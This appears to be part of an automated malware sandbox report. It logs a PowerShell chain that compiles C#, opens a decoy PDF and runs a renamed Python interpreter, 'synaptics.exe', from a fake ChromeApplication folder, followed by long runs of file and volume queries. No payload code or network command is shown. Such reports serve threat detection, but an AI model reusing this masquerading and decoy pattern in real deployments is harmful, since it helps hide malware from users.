Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeCode function: 7_2_00541278 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00541278
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeCode function: 7_2_00541710 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00541710
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeCode function: 7_2_005418A7 SetUnhandledExceptionFilter,7_2_005418A7
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeCode function: 7_2_6C5CA5A4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_6C5CA5A4
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeCode function: 7_2_73A8EB8F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_73A8EB8F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\o3u40tef\o3u40tef.cmdline"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Document.pdf"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exe "C:\Users\user\AppData\Local\ChromeApplication\synaptics.exe" C:\Users\user\AppData\Local\ChromeApplication\runtime.py Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES949A.tmp" "c:\Users\user\AppData\Local\Temp\o3u40tef\CSCF365B556FF7845F2AC7AB259D83AC6F.TMP"Jump to behavior
Source: win32con.py.0.drBinary or memory string: DOF_PROGMAN = 1
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeCode function: 7_2_005419E7 cpuid 7_2_005419E7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\DLLs VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\DLLs VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\DLLs VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\__init__.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\__init__.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\__init__.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\__init__.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\__init__.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\__pycache__\__init__.cpython-310.pyc.9632672 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\DLLs VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\codecs.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\codecs.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\codecs.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\codecs.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\codecs.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\__pycache__\codecs.cpython-310.pyc.9731392 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\aliases.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\aliases.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\aliases.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\aliases.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\aliases.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\__pycache__ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\__pycache__\aliases.cpython-310.pyc.9632928 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\utf_8.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\utf_8.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\utf_8.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\utf_8.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\utf_8.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\__pycache__ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\__pycache__\utf_8.cpython-310.pyc.9661160 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\cp1252.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\cp1252.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\cp1252.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\cp1252.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\cp1252.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\__pycache__ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\__pycache__\cp1252.cpython-310.pyc.9632800 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\DLLs VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\io.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\io.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\io.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\io.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\io.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\__pycache__ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\__pycache__\io.cpython-310.pyc.9731728 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\DLLs VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\abc.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\abc.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\abc.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\abc.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\abc.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\__pycache__ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\__pycache__\abc.cpython-310.pyc.9729824 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\DLLs VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\__pycache__ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\__pycache__\site.cpython-310.pyc.10756912 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\DLLs VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\os.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\os.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\os.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\os.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\os.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\__pycache__ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\__pycache__\os.cpython-310.pyc.10757136 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\DLLs VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\stat.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\stat.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\stat.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\stat.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\stat.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\__pycache__ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\__pycache__\stat.cpython-310.pyc.10756912 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\DLLs VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\_collections_abc.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\_collections_abc.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\_collections_abc.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\_collections_abc.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\_collections_abc.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\__pycache__ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\__pycache__\_collections_abc.cpython-310.pyc.9633312 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\DLLs VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\ntpath.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\ntpath.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\ntpath.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\ntpath.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\ntpath.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\__pycache__ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\__pycache__\ntpath.cpython-310.pyc.10758368 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\DLLs VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\genericpath.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\genericpath.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\genericpath.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\genericpath.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\genericpath.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\__pycache__ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\__pycache__\genericpath.cpython-310.pyc.9662120 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\DLLs VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\_sitebuiltins.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\_sitebuiltins.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\_sitebuiltins.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\_sitebuiltins.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\_sitebuiltins.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\__pycache__ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\__pycache__\_sitebuiltins.cpython-310.pyc.11046944 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\distutils-precedence.pth VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\DLLs VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\_distutils_hack\__init__.py VolumeInformationJump to behavior
